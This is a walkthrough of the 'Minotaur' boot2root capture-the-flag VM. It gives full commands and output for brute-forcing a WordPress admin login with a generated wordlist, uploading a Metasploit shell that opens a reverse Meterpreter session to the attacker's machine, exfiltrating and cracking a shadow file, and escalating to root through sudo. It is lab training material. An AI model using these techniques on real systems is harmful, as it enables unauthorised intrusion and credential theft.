Minotaur is a boot2root CTF. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal.
- This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
- One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.
After spinning up the VM and doing an ARP scan, we find it at
192.168.56.223. A port scan shows 3 ports available:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 ed:74:0c:c9:21:c4:58:47:d4:02:89:c7:e5:3e:09:18 (DSA) | 2048 0c:4b:a8:24:7e:fc:cd:8a:b1:9f:87:dd:9d:06:30:05 (RSA) |_ 256 40:9b:fe:f9:82:41:17:93:a2:96:34:25:1c:53:bb:ae (ECDSA) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 2020/tcp open ftp vsftpd 2.0.8 or later |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
There doesn’t appear to be anything within the FTP share, so let’s enumerate Apache a bit more. There don’t appear to be any custom comments/changes to the default page, so directory scanning is a next logical step.
[email protected]:~# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --sc 200 http://192.168.56.223/FUZZ/ ******************************************************** * Wfuzz 2.1.3 - The Web Bruteforcer * ******************************************************** Target: http://192.168.56.223/FUZZ/ Total requests: 3036 ================================================================== ID Response Lines Word Chars Request ================================================================== 00477: C=200 321 L 862 W 16057 Ch "bull"
Here, we find a ‘Bull Blog’, powered by Wordpress.
wpscan is my defacto tool for scanning Wordpress.
[email protected]:~# wpscan -u http://192.168.56.223/bull/
This spits out 12 potential vulnerabilities, most of them being XSS. The most promising looking one is a
Slideshow Gallery < 1.4.7 Arbitrary File Upload. However, we do need some valid credentials to do this.
wpscan can enumerate users for us, which is half the battle.
+----+-------+-------+ | Id | Login | Name | +----+-------+-------+ | 1 | bully | bully | +----+-------+-------+
Now, this is where that second hint comes into play - a password we aren’t likely to find in an existing wordlist. I generated my own password list using
john - a technique I learnt way back in Hell.
[email protected]:~/minotaur# cewl -m 5 -w bulls http://192.168.56.223/bull/ [email protected]:~/minotaur# wc -l bulls 315 bulls [email protected]:~/minotaur# john --wordlist=bulls --rules --stdout >> bulls [email protected]:~/minotaur# wc -l bulls 14590 bulls
That’s a lot of bulls :)
wpscan can also bruteforce the password for us, which is nice as we don’t have to screw around with
[email protected]:~/minotaur# wpscan -u http://192.168.56.223/bull/ -w /root/minotaur/bulls --username bully --threads 50 [+] Starting the password brute forcer Brute Forcing 'bully' Time: 00:03:32 <======================================================================= > (13331 / 14591) 91.36% ETA: 00:00:20 [+] [SUCCESS] Login : bully Password : Bighornedbulls
I manually logged in just to make sure they worked, and I also noted that this was an admin account (which was fairly predictable due to its ID). But it does mean that we don’t actually need to exploit the Slideshow Gallery vulnerability, as we can just upload a PHP Shell via this admin panel.
I’ll just use the
exploit/unix/webapp/wp_admin_shell_upload Metasploit module for this.
msf exploit(wp_admin_shell_upload) > exploit [*] Started reverse TCP handler on 192.168.56.101:4444 [*] Authenticating with WordPress using bully:Bighornedbulls... [+] Authenticated with WordPress [*] Preparing payload... [*] Uploading payload... [*] Executing the payload at /bull/wp-content/plugins/JthxXkaTsb/zQvuEhlHdT.php... [*] Sending stage (33684 bytes) to 192.168.56.223 [*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.223:53478) at 2016-04-15 17:08:46 +0100 [+] Deleted zQvuEhlHdT.php [+] Deleted JthxXkaTsb.php meterpreter > sysinfo Computer : minotaur OS : Linux minotaur 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 Meterpreter : php/php
The VM description told us that there are multiple flags, the first of which is found in the webroot.
meterpreter > cat /var/www/html/flag.txt Oh, lookey here. A flag! Th15 15 @N [email protected] [email protected]!
The second flag is found in the
/tmp directory, along with a priv-esc opportunity.
meterpreter > ls /tmp 100640/rw-r----- 121 fil 2015-05-27 03:47:45 +0100 flag.txt 100640/rw-r----- 1148 fil 2015-05-27 07:47:30 +0100 shadow.bak meterpreter > cat /tmp/flag.txt That shadow.bak file is probably useful, hey? Also, you found a flag! My m1L|<$|-|@|<3 br1|\|G$ @11 t3h b0y$ 2 t3h [email protected]|)
meterpreter > download /tmp/shadow.bak [*] downloading: /tmp/shadow.bak -> shadow.bak
I extracted the hashes for
h0rnbag and ran them through
john. I got one hit pretty quickly.
I was able to use these creds and login over SSH and retrieve his flag.
[email protected]:~/minotaur# ssh [email protected] [email protected]:~$ ls -l -rw------- 1 heffer heffer 107 May 27 2015 flag.txt [email protected]:~$ cat flag.txt So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet? Th3 [email protected] 15: m00000 y0
This user has a sudo entry, but it doesn’t seem to work.
[email protected]:~$ sudo -l User heffer may run the following commands on minotaur: (root) NOPASSWD: /root/bullquote.sh [email protected]:~$ sudo /root/bullquote.sh [sudo] password for heffer: sudo: /root/bullquote.sh: command not found
In the time I was poking around here, I got a second password from
obiwan6 (minotaur). I did a quick
su and collected
[email protected]:~$ su minotaur Password: [email protected]:/home/heffer$ cd [email protected]:~$ ls -l -rw------- 1 minotaur minotaur 107 May 27 2015 flag.txt drwxr-xr-x 4 minotaur minotaur 4096 May 27 2015 peda [email protected]:~$ cat flag.txt Congrats! You've found the first flag: M355 W17H T3H 8ULL, G37 73H H0RN! But can you get /root/flag.txt ?
minotaur is able to run ALL as
root. Which makes elevation to
root nice and easy.
[email protected]:~$ sudo -l User minotaur may run the following commands on minotaur: (root) NOPASSWD: /root/bullquote.sh (ALL : ALL) ALL [email protected]:~$ sudo -i [sudo] password for minotaur: [email protected]:~#
[email protected]:~# ls -l -rw------- 1 root root 70 May 27 2015 flag.txt drwxr-xr-x 4 root root 4096 May 27 2015 peda -rwx------ 1 root root 845 May 15 2015 quotes.txt [email protected]:~# cat flag.txt Congrats! You got the final flag! Th3 [email protected] is: 5urr0nd3d bY @r$3h0l35